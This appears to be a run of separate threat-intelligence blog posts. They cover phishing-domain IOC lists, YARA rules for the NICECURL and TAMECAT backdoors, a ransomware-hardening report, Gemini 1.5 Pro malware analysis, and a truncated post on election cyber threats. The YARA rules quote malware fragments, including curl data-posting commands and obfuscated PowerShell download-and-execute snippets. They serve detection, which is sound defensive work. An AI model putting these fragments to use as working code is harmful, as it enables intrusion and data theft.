view-total-step[.]online

Generic

N/A

viewstand[.]online

Generic

N/A

viewtop[.]online

Generic

N/A

virtue-regular-ready[.]online

Generic

N/A

we-transfer[.]shop

Generic

N/A

URL Shortening Services

m85[.]online

Generic

N/A

s51[.]online

Generic

N/A

s59[.]site

Generic

N/A

s20[.]site

Generic

N/A

d75[.]site

Generic

N/A

Cluster C

URL Shortening Services

bitly[.]org[.]il

Bitly

Israel

litby[.]us

Bitly

U.S.

Mailer Daemon

daemon-mailer[.]co

Mailer Daemon

N/A

daemon-mailer[.]info

Mailer Daemon

N/A

email-daemon[.]biz

Mailer Daemon

N/A

email-daemon[.]biz[.]tinurls[.]com

Mailer Daemon

N/A

email-daemon[.]online[.]tinurls[.]com

Mailer Daemon

N/A

email-daemon[.]online

Mailer Daemon

N/A

email-daemon[.]site

Mailer Daemon

N/A

mailer-daemon[.]info

Mailer Daemon

N/A

mailerdaemon[.]online

Mailer Daemon

N/A

mailer-daemon[.]us

Mailer Daemon

N/A

Think Tanks & Research Institutes

aspenlnstitute[.]org

Aspen Institute

U.S.

mccainlnstitute[.]org

Mccain Institute

U.S.

washingtonlnstitute[.]org

The Washington Institute

U.S.

File Sharing Services

youtransfer[.]live

YouTransfer

N/A

Miscellaneous 

g-online[.]org

Generic

N/A

online-access[.]live

Generic

N/A

youronlineregister[.]com

Generic

N/A

Malware Operations NICECURL

Related IOCs

d5a05212f5931d50bb024567a2873642

347b273df245f5e1fcbef32f5b836f1d

2f6bf8586ed0a87ef3d156124de32757

13aa118181ac6a202f0a64c0c7a61ce7

c23663ebdfbc340457201dbec7469386

853687659483d215309941dae391a68f

drive-file-share[.]site

prism-west-candy[.]glitch[.]me

NICECURL: YARA Rules rule M_APT_Backdoor_NICECURL_1 { meta: author = "Mandiant" md5 = "c23663ebdfbc340457201dbec7469386" date_created = "2024-01-18" date_modified = "2024-01-18" rev = "1" strings: $ = "a = \"llehS.tpircsW\"" ascii wide $ = "b = StrReverse(a)" ascii wide $ = "Set objShell = wscript.CreateObject(b)" $ = "WHFilePath = Temp & \"/\" & ProgName" ascii wide $ = "Do While not FileExists(WHFilePath)" ascii wide $ = "cmd /C start /MIN curl --ssl-no-revoke -s -d \"\"\"" ascii wide $ = "nicecmdPath = Temp & \"/\" & ProgName" ascii wide $ = "Function RunCom(Com, Url, nicecmdPath)" ascii wide $ = "ComDecode = Base64Decode(Com)" ascii wide $ = "InStr(ComDecode, \"kill\")" ascii wide $ = "InStr(ComDecode, \"SetNewConfig\")" ascii wide $ = "InStr(ComDecode, \"Module\")" ascii wide $ = "Sub DeleteFile(filespec)" ascii wide $ = "Sub CopyFile(Src, Dst)" ascii wide $ = "Function SendData(sUrl, sRequest, nicecmdPath)" ascii wide $ = "Function WriteToFile(FilePath, data)" ascii wide $ = "Function GetSystemCaption()" ascii wide $ = "Function GetPlainSess()" ascii wide condition: 4 of them } rule M_APT_Backdoor_NICECURL_datamine_module_1 { meta: author = "Mandiant" md5 = "853687659483d215309941dae391a68f" date_created = "2024-01-18" date_modified = "2024-01-18" rev = "1" strings: $ = "a = \"llehS.tpircsW\"" ascii wide $ = "b = StrReverse(a)" ascii wide $ = "Set objShell = wscript.CreateObject(b)" ascii wide $ = "ModuleName & \" module started successfully.\"" ascii wide $ = "SendLog(MAC, Logs, ModuleName, \"Success\")" ascii wide $ = "& vbNewLine & \"*** Ant:\"" ascii wide $ = "For Each antivirus in installedAntiviruses" ascii wide $ = "list=list & VBNewLine & antivirus.displayName" ascii wide $ = "checking the state of the 12th bit of productState property of the antivirus" ascii wide $ = "For Each item In query_result" ascii wide $ = "Set query_result = objWMI.ExecQuery(\"" ascii wide $ = "Function SendFile(FilePath, ModuleName)" ascii wide $ = "Function SendData(Base64Data, FolderName, FileName, Format)" ascii wide $ = "call HTTPPost(Url, sRequest)" ascii wide $ = "ChunckData = Mid(Base64Data, 1, lengthdata)" ascii wide $ = "ChunckData = Mid(Base64Data, (i * lengthdata) + 1)" ascii wide $ = "ChunckData = Mid(Base64Data, (i * lengthdata) + 1, lengthdata)" ascii wide $ = "Function SendLog(MAC, Logs, ModuleName, Status)" ascii wide condition: 4 of them } TAMECAT

Related IOCs

d7bf138d1aa2b70d6204a2f3c3bc72a7

081419a484bbf99f278ce636d445b9d8

c3b9191f3a3c139ae886c0840709865e

dd2653a2543fa44eaeeff3ca82fe3513

9c5337e0b1aef2657948fd5e82bdb4c3

tnt200[.]mywire[.]org

accurate-sprout-porpoise[.]glitch[.]me

TAMECAT: YARA Rules rule M_APT_Backdoor_TAMECAT_2 { meta: author = "Mandiant" md5 = "9c5337e0b1aef2657948fd5e82bdb4c3" date_created = "2024-03-05" date_modified = "2024-03-05" rev = "1" strings: $ = "$a.CreateDecryptor($a.Key,$a.iv)" $ = "$CommandParts = \"\"" $ = "$macP = $env:APPDATA+\"\\" $ = "$macP = \"$env:LOCALAPPDATA\\" $ = "$mac += Get-Content -Path $macP" $ = "$CommandParts =$SessionResponse.Split(\"" $ = "[string]$CommandPart = \"\";" $ = "Foreach ($CommandPart in $CommandParts)" $ = "$CommandPart.Split(\"~\");" $ = "elseif($StartStop -eq \"stop\")" $ = "if($StartStop -eq \"start\")" $ = "&(gcm *ke-e*) $Command;" condition: 3 of them and filesize<2MB } rule M_APT_Downloader_TAMECAT_NICECURL_VBScript_1 { meta: author = "Mandiant" md5 = "d7bf138d1aa2b70d6204a2f3c3bc72a7" date_created = "2024-03-13" date_modified = "2024-03-13" rev = "1" strings: $ = "For Each antivirus in installedAntiviruses" $ = "list=list & VBNewLine & antivirus.displayName" $ = "\"conhost conhost powershell.exe -w 1 -c \"" $ = "-UseBasicParsing).Content; &(gcm *e-e?p*)$" $ = "Set oE = objShell.Exec(" $ = "\"cmd.exe /c set c=cu9rl --s9sl-no-rev9oke -s -d \"" $ = "& call %c:9=% & set b=sta9rt" condition: 3 of them } rule M_APT_Backdoor_TAMECAT { meta: author = "Mandiant" md5 = "d7bf138d1aa2b70d6204a2f3c3bc72a7" date_created = "2024-03-11" date_modified = "2024-03-11" rev = "1" strings: $s1 = "OutputCom = OutputCom & \"NOT_FOUND\"" ascii wide $s2 = "OutputCom = OutputCom & list" ascii wide $s3 = "If antivirus.productState And &h01000 Then" ascii wide condition: all of them }

Written by: Matthew McWhirt, Omar ElAhdan, Glenn Staniforth, Brian Meyer 

Multi-faceted extortion via ransomware and/or data theft is a popular end goal for attackers, representing a global threat targeting organizations in all industries. The impact of a successful ransomware event can be material to an organization, including the loss of access to data, systems, and prolonged operational outages. The potential downtime, coupled with unforeseen expenses for restoration, recovery, and implementation of new security processes and controls can be overwhelming.

Since the initial launch of our report in 2019, data theft and ransomware deployment tactics have continued to evolve and escalate. This evolution marks a shift from manual or script-based ransomware deployment to sophisticated, large-scale operations, including:

• Weaponizing Trusted Service Infrastructure (TSI): Adversaries are increasingly abusing legitimate infrastructure and security tools (TSI) to rapidly propagate malware or ransomware across entire networks.

• Targeting Virtualization Platforms: Attackers are actively focusing on the virtualization layer, aiming to mass-encrypt virtual machines (VMs) and other critical systems at scale.

• Targeting Backup Data / Platforms: Threat actors are exploiting misconfigurations or security gaps in backup systems to either erase or corrupt data backups, severely hindering recovery efforts.

Based upon these newer techniques, it is critical that organizations identify the span of the attack surface, and align proper security controls and visibility that includes coverage for protecting:

• Identities

• Endpoints

• Network Architectures

• Remote Access Platforms

• Trusted Service Infrastructure (TSI)

Cascading weaknesses across these layers create opportunities for attackers to breach an organization's perimeter, gain initial access, and maintain a persistent foothold within the compromised network.

In our updated report, Ransomware Protection and Containment Strategies, we have expanded the strategies organizations can proactively take to identify gaps and harden their environment(s)to prevent the downstream impact of a ransomware event. The strategies represent practical and scalable methods to protecting organizations, and are the same strategies  that are leveraged by Mandiant when working with clients across the globe.  

The report covers several areas to help organizations mitigate the risk of and contain ransomware events including:

• Attack Surface Identification and Reduction

• Endpoint Hardening

• Credential Protections

• Domain Controller Protections

• Group Policy Objects (GPOs) 

• Virtualization Infrastructure Protections

• Backup Infrastructure Protections

If you are reading this report to aid your organization’s response to an existing ransomware event, it is important to understand how the ransomware was deployed through the environment and design your ransomware response appropriately. This guide should help organizations in that process.

Download the report today.

*Note: The recommendations in this report can help organizations mitigate the risk of and contain ransomware events. However, this report does not cover all aspects of a ransomware incident response. We do not discuss investigative techniques to identify and remove backdoors (ransomware operators often have multiple backdoors into victim environments), communicating and negotiating with threat actors, or recovering data once a decryptor is provided.

Executive Summary

• A growing amount of malware has naturally increased workloads for defenders and particularly malware analysts, creating a need for improved automation and approaches to dealing with this classic threat.
• With the recent rise in generative AI tools, we decided to put our own Gemini 1.5 Pro to the test to see how it performed at analyzing malware. By providing code and using a simple prompt, we asked Gemini 1.5 Pro to determine if the file was malicious, and also to provide a list of activities and indicators of compromise.
• We did this for multiple malware files, testing with both decompiled and disassembled code, and Gemini 1.5 Pro was notably accurate each time, generating summary reports in human-readable language. Gemini 1.5 Pro was even able to make an accurate determination of code that — at the time — was receiving zero detections on VirusTotal. 
• In our testing with other similar gen AI tools, we were required to divide the code into chunks, which led to vague and non-specific outcomes, and affected the overall analysis. Gemini 1.5 Pro, however, processed the entire code in a single pass, and often in about 30 to 40 seconds.

Introduction

The explosive growth of malware continues to challenge traditional, manual analysis methods, underscoring the urgent need for improved automation and innovative approaches. Generative AI models have become invaluable in some aspects of malware analysis, yet their effectiveness in handling large and complex malware samples has been limited. The introduction of Gemini 1.5 Pro, capable of processing up to 1 million tokens, marks a significant breakthrough. This advancement not only empowers AI to function as a powerful assistant in automating the malware analysis workflow but also significantly scales up the automation of code analysis. By substantially increasing the processing capacity, Gemini 1.5 Pro paves the way for a more adaptive and robust approach to cybersecurity, helping analysts manage the asymmetric volume of threats more effectively and efficiently.

Traditional Techniques for Automated Malware Analysis

The foundation of automated malware analysis is built on a combination of static and dynamic analysis techniques, both of which play crucial roles in dissecting and understanding malware behavior. Static analysis involves examining the malware without executing it, providing insights into its code structure and unobfuscated logic. Dynamic analysis, on the other hand, involves observing the execution of the malware in a controlled environment to monitor its behavior, regardless of obfuscation. Together, these techniques are leveraged to gain a comprehensive understanding of malware.

Parallel to these techniques, AI and machine learning (ML) have increasingly been employed to classify and cluster malware based on behavioral patterns, signatures, and anomalies. These methodologies have ranged from supervised learning, where models are trained on labeled datasets, to unsupervised learning for clustering, which identifies patterns without predefined labels to group similar malware.

Despite technological advancements, the increasing complexity and volume of malware present substantial challenges. While ML enhances the detection of malware variants, it remains inadequate against completely new threats. This detection gap allows advanced attacks to slip through cybersecurity defenses, compromising system protection.

Generative AI as Malware Analysis Assistant 

Code Insight, unveiled at the RSA Conference 2023, marked a significant step forward in leveraging generative AI (gen AI) for malware analysis. This novel feature of Google's VirusTotal platform specializes in analyzing code snippets and generating reports in natural language, effectively emulating the approach of a malware analyst. Initially supporting PowerShell scripts, Code Insight later expanded to other scripting languages and file formats, including Batch, Shell, VBScript, and Office documents.

By processing the code and generating summary reports, Code Insight assists analysts in understanding the behavior of the code and identifying attack techniques. This includes uncovering hidden functionalities, malicious intent, and potential attack vectors that might be missed by traditional detection methods.

However, due to the inherent constraints of large language models (LLMs) and their limited token input capacity, the size of files that Code Insight could handle was restricted. Although there have been continuous improvements to increase the maximum file size limit and support more formats, analyzing binaries and executables still poses a significant challenge. When these files are disassembled or decompiled, their code size typically surpasses the processing capabilities of the LLMs available at the time. Consequently, gen AI models have functioned primarily as assistants to human analysts, enabling the analysis of specific code fragments from binaries rather than processing the entire code, which is often too voluminous for these models.

Reverse Engineering: The Human Face of Malware Analysis

Reverse engineering is arguably the most advanced malware analysis technique available to cybersecurity professionals. This process involves disassembling the binaries of malicious software and carrying out a meticulous examination of the code. Through reverse engineering, analysts can uncover the exact functionality of malware and understand its execution flow. However, this method is not without its challenges. It requires an immense amount of time, a deep level of expertise, and an analytical mindset to interpret each instruction, data structure, and function call to reconstruct the malware's logic and uncover its secrets.

Furthermore, scaling reverse engineering efforts poses a significant challenge. The scarcity of specialized talent in this field exacerbates the difficulty of conducting these analyses at scale. Given the intricate and time-consuming nature of reverse engineering, the cybersecurity community has long sought ways to augment this process, making it more efficient and accessible.

Gemini 1.5 Pro: Scalable Reverse Engineering for Malware Analysis

The ability to process prompts of up to 1 million tokens enables a qualitative leap in malware analysis, particularly in the realm of reverse engineering. This advancement finally brings the power of gen AI to the analysis of binaries and executables, a task previously reserved for highly skilled human analysts due to its complexity.

How does Gemini 1.5 Pro achieve this?

• Increased capacity: With its expanded token limit, Gemini 1.5 Pro can entirely analyze some disassembled or decompiled executables in a single pass, eliminating the need to break down code into smaller fragments. This is crucial because fragmenting code can lead to a loss of context and important correlations between different parts of the program. When analyzing only small snippets, it is difficult to understand the overall functionality and behavior of the malware, potentially missing key insights into its purpose and operation. By analyzing the entire code at once, Gemini 1.5 Pro gains a holistic understanding of the malware, allowing for more accurate and comprehensive analysis.
• Code interpretation: Gemini 1.5 Pro can interpret the intent and purpose of the code, not just identify patterns or similarities. This is possible due to its training on a massive dataset of code, encompassing assembly language from various architectures, high-level languages like C, and pseudo-code produced by decompilers. This extensive knowledge base, combined with its understanding of operating systems, networking, and cybersecurity principles, allows Gemini 1.5 Pro to effectively emulate the reasoning and judgment of a malware analyst. As a result, it can predict the malware's actions and provide valuable insights even for never-seen-before threats. For more information on this, see the zero day case study section later in this post.
• Detailed analysis: Gemini 1.5 Pro can generate summary reports in human-readable language, making the analysis process more accessible and efficient. This goes far beyond the simple verdicts typically provided by traditional machine learning algorithms for classification and clustering. Gemini 1.5 Pro's reports can include detailed information about the malware's functionality, behavior, and potential attack vectors, as well as indicators of compromise (IOCs) that can be used to feed other security systems and improve threat detection and prevention capabilities.

Let's explore a practical case study to examine how Gemini 1.5 Pro performs in analyzing decompiled code with a representative malware sample. We processed two WannaCry binaries automatically using the Hex-Rays decompiler, without adding any annotations or additional context. This approach resulted in two C code files, one 268 KB and the other 231 KB in size, which together amount to more than 280,000 tokens for processing by the LLM.

In our testing with other similar gen AI tools, we faced the necessity of dividing the code into chunks. This fragmentation often compromised the comprehensiveness of the analysis, resulting in vague and non-specific outcomes. These limitations highlight the challenges of using such tools with complex code bases.

Gemini 1.5 Pro, however, marks a significant departure from these constraints. It processes the entire decompiled code in a single pass, taking just 34 seconds to deliver its analysis. The initial summary provided by Gemini 1.5 Pro is notably accurate, showcasing its ability to handle large and complex datasets seamlessly and effectively:

• Issues a malicious verdict associated with ransomware
• Identifies some files as IOCs (c.wnry and tasksche.exe)
• Acknowledges the use of an algorithm to generate IP addresses and perform network scans to find targets on port 445/SMB to spread to other computers
• Identifies URL/domain (WannaCry's "killswitch") and relevant registry key and mutex

While it might seem that Gemini 1.5 Pro's report of WannaCry is based on pre-trained knowledge of this specific malware, this isn't the case. The analysis comes from the model's ability to independently interpret the code. This will become even clearer as we look at the upcoming examples where Gemini 1.5 Pro analyzes unfamiliar malware samples, demonstrating its wide-ranging capabilities.

LLM on Code: Disassembled vs. Decompiled

In the previous example showcasing WannaCry analysis, there was a crucial step before feeding the code to the LLM: decompilation. This process, which transforms binary code into a higher-level representation like C, is fully automated and mirrors the initial steps taken by malware analysts when manually dissecting malicious software. But what is the difference between disassembled and decompiled code, and how does it impact LLM analysis?

• Disassembly: This process converts binary code into assembly language, a low-level representation specific to the processor architecture. While human-readable, assembly code is still quite complex and requires significant expertise to understand. It is also much longer and more repetitive than the original source code.
• Decompilation: This process attempts to reconstruct the original source code from the binary. While not always perfect, decompilation can significantly improve readability and conciseness compared to disassembled code. It achieves this by identifying high-level constructs like functions, loops, and variables, making the code easier to understand for analysts.

Given these factors, when using LLMs for binary analysis, decompilation offers several advantages on efficiency and scalability. The shorter and more structured output from decompilation fits more readily within the processing constraints of LLMs, allowing for a more efficient analysis of large or complex binaries. In fact, the output from a decompiler is five to 10 times more concise than that produced by a disassembler.

Disassembly is necessary to perform accurate decompilation and remains an invaluable tool in certain scenarios where detailed, low-level analysis is crucial. Given the structured and higher-level nature of decompiled output, there are specific circumstances where disassembly provides insights that decompilation cannot match.

Fortunately, Gemini 1.5 Pro demonstrates equal capability in processing both high-level languages and assembly across various architectures. Thus, our implementation for automating binary analysis can utilize both strategies or adopt a hybrid approach, as suited to the specific circumstances of each case. This flexibility allows us to tailor our analysis method to the nature of the binary in question, optimizing for efficiency, depth of insight, and the specific objectives of the analysis, whether that means dissecting the logic and flow of the program or diving into the intricate details of its low-level operations.

Next, we'll examine a case where we directly employ disassembly for analysis. This time, we're working with a more recent and unknown binary; in fact, the executable submitted to VirusTotal is flagged as malicious by only four out of the 70 VirusTotal anti-malware engines, and only in a generic sense, without providing any details about the malware family that could offer further clues about its behavior.

After automatic preprocessing with HexRays/IDA Pro, the 306.50 KB executable binary produces a 1.5 MB assembly file that Gemini 1.5 Pro can process in a single pass within 46 seconds , thanks to its large token window in the prompt. This capability allows for an analysis of the entire assembly output, offering detailed insights into the binary's operations.

This case of the unknown binary showcases the remarkable capabilities of Gemini 1.5 Pro. Despite only four out of 70 anti-malware engines on VirusTotal flagging the file as malicious—using only generic signatures—Gemini 1.5 Pro identified the file as malicious, providing a detailed explanation for its verdict. The file is likely a game cheat designed to inject a game hack dynamic-link library (DLL) into the Grand Theft Auto video game process. The designation of "malicious" may depend on perspective: deemed malicious by the game's developers or their security team focused on anti-cheating measures, yet potentially desirable for some players. Nevertheless, this automated first-pass analysis is not only impressive but also illuminating regarding the nature and intent of the binary.

Unveiling the Unknown: A Case Study in Zero-Day Detection

The true test of any malware analysis tool lies in its ability to identify never-before-seen threats undetected by traditional methods and proactively protecting systems from zero-day attacks. Here, we examine a case where an executable file is undetected by any anti-virus or sandbox on VirusTotal.

The 833 KB file, medui.exe, was decompiled into 189,080 tokens and subsequently processed by Gemini 1.5 Pro in a mere 27 seconds to produce a complete malware analysis report in a single pass.

This analysis revealed suspicious functionalities, leading Gemini 1.5 Pro to issue a malicious verdict. Based on its observations, it concluded that the primary goal of this malware is to steal cryptocurrency by hijacking Bitcoin transactions and evading detection through the disabling of security software.

This showcases Gemini's ability to go beyond simple pattern matching or ML classification and leverage its deep understanding of code behavior to identify malicious intent, even in previously unseen threats. This is a significant advancement in the field of malware analysis, as it allows us to proactively detect and respond to new and emerging threats that traditional methods might miss.

From Assistant to Analyst

Gemini 1.5 Pro unlocks impressive capabilities, enabling the analysis of large volumes of decompiled and disassembled code. It has the potential to significantly change our approach to fighting malware by enhancing efficiency, accuracy, and our ability to scale in response to a growing number of threats.

However, it's important to remember that this is just the beginning. While Gemini 1.5 Pro represents a significant leap forward, the field of gen AI is still in its infancy. There are several challenges that need to be addressed to achieve truly robust and reliable automated malware analysis:

• Obfuscation and packing: Malware authors are constantly developing new techniques to obfuscate their code and evade detection. In response, there's a growing need to not only continuously improve gen AI models but also to enhance the preprocessing of binaries before analysis. Adopting dynamic approaches that utilize various preprocessing tools can more effectively unpack and deobfuscate malware. This preparatory step is crucial for enabling gen AI models to accurately analyze the underlying code, ensuring they keep pace with evolving obfuscation techniques and remain effective in detecting and understanding sophisticated malware threats.
• Increasing binary size: The complexity of modern software is mirrored in the growing size of its binaries. This trend presents a significant challenge, as the majority of gen AI models are constrained by much lower token window limits. In contrast, Gemini 1.5 Pro stands out by supporting up to 1 million tokens—currently the highest known capacity in the field. Nevertheless, even with this remarkable capability, Gemini 1.5 Pro may encounter limitations when handling exceptionally large binaries. This underscores the ongoing need for advancements in AI technology to accommodate the analysis of increasingly large files, ensuring comprehensive and effective malware analysis as software complexity continues to escalate.
• Evolving attack techniques: As attackers continuously innovate, crafting new methods to bypass security measures, the challenge for gen AI models extends beyond simple adaptability. These models must not only learn and recognize new threats but also evolve in conjunction with the efforts of researchers and developers. There's a need to devise new methods for automating the preprocessing of threat data, which would enrich the context provided to AI models. For instance, integrating additional data from static and dynamic analysis tools, such as sandbox reports, plus the decompiled and disassembled code, can significantly enhance the models' understanding and detection capabilities. 

The journey towards scaling automated malware analysis is ongoing, but Gemini 1.5 Pro marks a significant milestone. Give Gemini 1.5 Pro a try; we look forward to seeing the innovative ways the community leverages it to enhance security operations.

At GSEC Malaga, we continue to research and develop ways to apply these models effectively in AI, pushing the boundaries of what's possible in cybersecurity and contributing to a safer digital future. 

Malware Details

The following table contains details on the malware samples discussed in this post.

Filename

SHA-256 Hash

Size

First Seen

File Type

lhdfrgui.exe (WannaCry dropper)

24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c

3.55 MB (3723264 bytes)

2017-05-12

Win32 EXE

tasksche.exe (WannaCry cryptor)

ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa

3.35 MB (3514368 bytes)

2017-05-12

Win32 EXE

EXEC.exe

1917ec456c371778a32bdd74e113b07f33208740327c3cfef268898cbe4efbfe

306.50 KB (313856 bytes)

2022-04-18

Win32 EXE

medui.exe

719b44d93ab39b4fe6113825349addfe5bd411b4d25081916561f9c403599e50

833.50 KB (853504 bytes)

2024-03-27

Win32 EXE

Prompt

The following is the exact prompt used in all the examples covered in the post. The only exception is the example where the word "disassembled" is used instead of "decompiled" because, as explained, we're working with disassembled code rather than decompiled code to show that Gemini 1.5 Pro can interpret both.

Act as a malware analyst by thoroughly examining this decompiled executable code. Methodically break down each step, focusing keenly on understanding the underlying logic and objective. Your task is to craft a detailed summary that encapsulates the code's behavior, pinpointing any malicious functionality. Start with a verdict (Benign or Malicious), then a list of activities including a list of IOCs if any URLs, created files, registry entries, mutex, network activity, etc.

+[attached decompiled.c.txt sample file]

Written by: Kelli Vanderlee, Jamie Collier

 

Executive Summary

• The election cybersecurity landscape globally is characterized by a diversity of targets, tactics, and threats. Elections attract threat activity from a variety of threat actors including: state-sponsored actors, cyber criminals, hacktivists, insiders, and information operations as-a-service entities. Mandiant assesses with high confidence that state-sponsored actors pose the most serious cybersecurity risk to elections.

• Operations targeting election-related infrastructure can combine cyber intrusion activity, disruptive and destructive capabilities, and information operations, which include elements of public-facing advertisement and amplification of threat activity claims. Successful targeting does not automatically translate to high impact. Many threat actors have struggled to influence or achieve significant effects, despite their best efforts. 

• When we look across the globe we find that the attack surface of an election involves a wide variety of entities beyond voting machines and voter registries. In fact, our observations of past cycles indicate that cyber operations target the major players involved in campaigning, political parties, news and social media more frequently than actual election infrastructure.  

• Securing elections requires a comprehensive understanding of many types of threats and tactics, from distributed denial of service (DDoS) to data theft to deepfakes, that are likely to impact elections in 2024. It is vital to understand the variety of relevant threat vectors and how they relate, and to ensure mitigation strategies are in place to address the full scope of potential activity. 

• Election organizations should consider steps to harden infrastructure against common attacks, and utilize account security tools such as Google’s Advanced Protection Program to protect high-risk accounts.

Introduction 

The 2024 global election cybersecurity landscape is characterized by a diversity of targets, tactics, and threats. An expansive ecosystem of systems, administrators, campaign infrastructure, and public communications venues must be secured against a diverse array of operators and methods. Any election cybersecurity strategy should begin with a survey of the threat landscape to build a more proactive and tailored security posture. 

The cybersecurity community must keep pace as more than two billion voters are expected to head to the polls in 2024. With elections in more than an estimated 50 countries, there is an opportunity to dynamically track how threats to democracy evolve. Understanding how threats are targeting one country will enable us to better anticipate and prepare for upcoming elections globally. At the same time, we must also appreciate the unique context of different countries. Election threats to South Africa, India, and the United States will inevitably differ in some regard. In either case, there is an opportunity for us to prepare with the advantage of intelligence. 

The variety of threat actors and intentions exposes election-related targets to a range of cyber threat vectors. In addition to tactics that Mandiant commonly associates with cyber intrusion activity, such as phishing, exploitation of internet-exposed systems, and data theft, election cyber threat activity also seeks to influence public perceptions and voter choices. The tactics to accomplish this public-facing objective often leverage disruptive tactics. This includes web defacements, DDoS attacks, as well as publicizing intrusions and stolen data via leak sites or social media campaigns. Foreign state aligned information operations disseminate content on websites and social media. This is often intended to mislead target populations or encourage social divisions and mistrust in leaders and institutions.

Despite the variety of cybersecurity challenges facing election ecosystems, it is important for the security community to remain level-headed. Information operations and disruptive cyber campaigns thrive when their impacts are built up. This makes objective and data-driven analysis essential. The variety of election cyber threat vectors presents complexity, but also highlights that direct election result interference attempts account for a small proportion of the overall threat landscape. 

Diversity of Targets: Protecting the Entire Election Ecosystem 

The attack surface of an election involves a range of entities. This includes election systems and infrastructure, election administrators, entities involved in running the election, and organizations involved in political campaigning — including news and media organizations (Figure 1). The ease of targeting and nature of cyber threat activity (cyber espionage, information operations, extortion, etc.) can vary across entities within these categories.

Figure 1: Cyber Threat Activity May Impact a Variety of Election-Related Targets in 2024; Historical Observations Suggest Election Campaigns and Voters Targeted Most Frequently

Diversity of Tactics: Multiple Threat Vectors at Play 

With multiple cyber threat vectors impacting election-related infrastructure, it is vital for defenders to identify the most likely scenarios that could impact them. 

Figure 2 depicts our best assessment of the relative likelihood and magnitude of a particular cyber threat tactic being used against the three categories of election-related targets described in Figure 1. The likelihood assessments are based on how frequently we have observed or inferred use of these tactics during past election cycles. Magnitude assessments reflect the average amount of time and effort we estimate organizations expend to recover from events using these tactics as well as the strength of official responses to past incidents. 

These assessments consider each tactic in isolation. However, Mandiant suggests that the combination of several tactics in the context of a single event would likely increase the severity of the campaign because we have seen this pattern play out during the most serious cyber threat events targeting elections over the last decade. Hack and leak represents a long-standing example of this in action: sensitive information stolen through a network intrusion boosts the effectiveness of subsequent information operations that can leverage authentic documents to maximize societal disruption.

Figure 2: Relevant TTPs for 2024 Global Election-Related Targets

In the most significant cyber incidents targeting elections that Mandiant has tracked, threat actors have deliberately layered multiple tactics in hybrid operations in such a way that the effect of each component magnifies the others. 

During the May 2014 Ukrainian presidential election, purported pro-Russian hacktivists CyberBerkut claimed credit for a series of malicious activities against the Ukrainian Central Election Commission (CEC) including a system compromise, destruction of vital data and systems including vote tabulation software, a data leak, a DDoS attack, and an attempted defacement of the CEC website with fake election results. Ukrainian officials suspect that the operation was not conducted by independent hacktivists, citing the presence of malware on affected systems that is confidently attributed to Russian state attributed cyber espionage operators.

Figure 3: Operations Likely to Combine Traditional Cyber Intrusion and IO Tactics

In 2020, Iranian actors attempted to compromise multiple U.S. state voter registration or information websites. They used stolen voter contact information to send threatening emails and social media direct messages impersonating the “Proud Boys” to intimidate U.S. officials and voters.The operation used a video — also featuring stolen voter data — to publicize a false claim of weaknesses in U.S. election systems (Figure 4). On election day, the actors allegedly attempted to log in to a previously compromised media outlet, likely to use the access to disseminate additional false information. U.S. authorities linked the threat actors to Iranian company Emennet Pasargad, which has contracted with the Iranian government.

Figure 4: Screenshot from threat actor video

Mandiant has observed similar dynamics of hybrid operations demonstrated frequently during the ongoing Russia-Ukraine conflict. 

For example, DDoS attacks disrupted the websites and some online services of Ukrainian government agencies and financial services organizations shortly before the advancement of Russian troops in February 2022. U.S. and UK officials attributed these DDoS attacks to the Russian Main Intelligence Directorate (GRU). On the same day, Ukrainians also received SMS messages claiming that ATM services were malfunctioning, which were debunked by Ukrainian cyber police as inaccurate. While the DDoS attacks only caused short-term technical disruption to online banking services, the overarching aim of the campaign was to undermine public trust in the integrity of the Ukrainian financial services industry and provoke panic in the run-up to a physical conflict.  

In fact, the blending of cyber and information operations is an essential pillar of Russia’s strategy. This is reflected in its information confrontation doctrine that combines reconnaissance, disruptive technical effects, and psychological operations (Figure 5). This approach plays out in the wiper operations conducted by the GRU in Ukraine. Here, Russian threat actors steal data from targeted systems, deploy wiper malware, and then telegraph the success of their operations by calling attention to the disruption and providing evidence of a compromise with the stolen materials via Telegram channels.

Figure 5: The GRU’s Disruptive Playbook

Russia’s approach to wiper operations in Ukraine highlights the importance of understanding threats from an adversary's perspective. By understanding the doctrine and cyber strategy of state threats, we can better understand how they might seek to target election-related processes. 

Diversity of Threat Actors: More Players in the Game 

Elections attract cyber threat activity from nearly every variety of threat actor that Mandiant tracks in terms of motivation, capability and intent. Mandiant assesses with high confidence that state-sponsored cyber threat actors pose the most serious risk to elections, particularly when these operations can combine state level resourcing with traditional cyber intrusion activity, disruptive and destructive capabilities, and information operations and hacktivist style tactics, elements of public-facing advertisement and amplification of threat activity claims. 

• State-sponsored actors: Government organizations, contractors, and others working on behalf of governments are the most persistent threat to elections. Military and security services are regularly tasked with cyber espionage intelligence collection against election related targets, with information operations and election interference increasingly becoming standard practice. State media services also have a role in information operations. Operations by these actors often benefit from long planning cycles, significant resources, and specific expertise. Based on previously observed activity taking place in the runup to elections, these operations are conducted for a variety of purposes, although rarely in an attempt to directly impact the process of voting and the tabulation of results.

• Cybercrime: Financially motivated actors may affect elections despite no specific interest in the elections themselves. Ransomware and extortion operations target victims simply for their ability to pay. It is common for cyber criminals to offer compromised data or access for sale on underground forums, including from election-related organizations. The plentitude of election related organizations and systems significantly increases the likelihood of a related criminal event.

• Hacktivists: Ideologically or politically motivated independent actors have carried out attacks on election related targets on several occasions. This activity is often sporadic, linked to foreign conflicts or domestic controversies, and typically causes only superficial impacts, such as the temporary disruption of election related websites.

• Insider threats: Insider threats have become a concern for election officials given the privileged access they hold. Some are malicious insiders such as employees looking to steal data or sabotage the organization. Others are unintentional insiders such as employees who make mistakes or fall victim to phishing attacks.

• Information operations as-a-service: Mandiant and open sources have documented PR firms using deceptive information operations tactics during elections to promote messaging that supports or criticizes candidates or issues. These tactics include coordinated inauthentic social media advocacy, comment brigading, and operating sock puppet accounts. Mandiant tracks several prominent examples, such as the HaiEnergy and Doppelganger campaigns, that we suspect or have confirmed conduct this activity on behalf of nation states.

HaiEnergy Exploits U.S. News Outlets via Newswire Services and Stage In-Person Protests 

